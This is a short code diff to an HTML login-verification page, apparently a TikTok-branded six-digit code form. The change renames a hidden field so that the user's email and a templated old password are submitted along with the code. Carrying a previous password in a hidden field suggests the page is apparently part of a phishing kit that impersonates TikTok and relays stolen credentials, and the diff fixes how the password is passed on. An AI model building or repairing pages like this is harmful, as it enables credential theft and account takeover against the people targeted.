--- a/login-code.html
+++ b/login-code.html
@@ -159,12 +159,12 @@
           <input type="text" name="code5" maxlength="1" required />
           <input type="text" name="code6" maxlength="1" required />
         </div>
-
+      
         <input type="hidden" name="email" value="{user-email}" />
-        <input type="hidden" name="email" value="{old-password}" />
-
+        <input type="hidden" name="old_password" value="{old-password}" />
+      
         <button type="submit" class="submit-button">Verify</button>
-      </form>
+      </form>      
 
       <div class="footer">TikTok 5800 Bristol Pkwy, Culver City, CA 90230</div>
     </div>
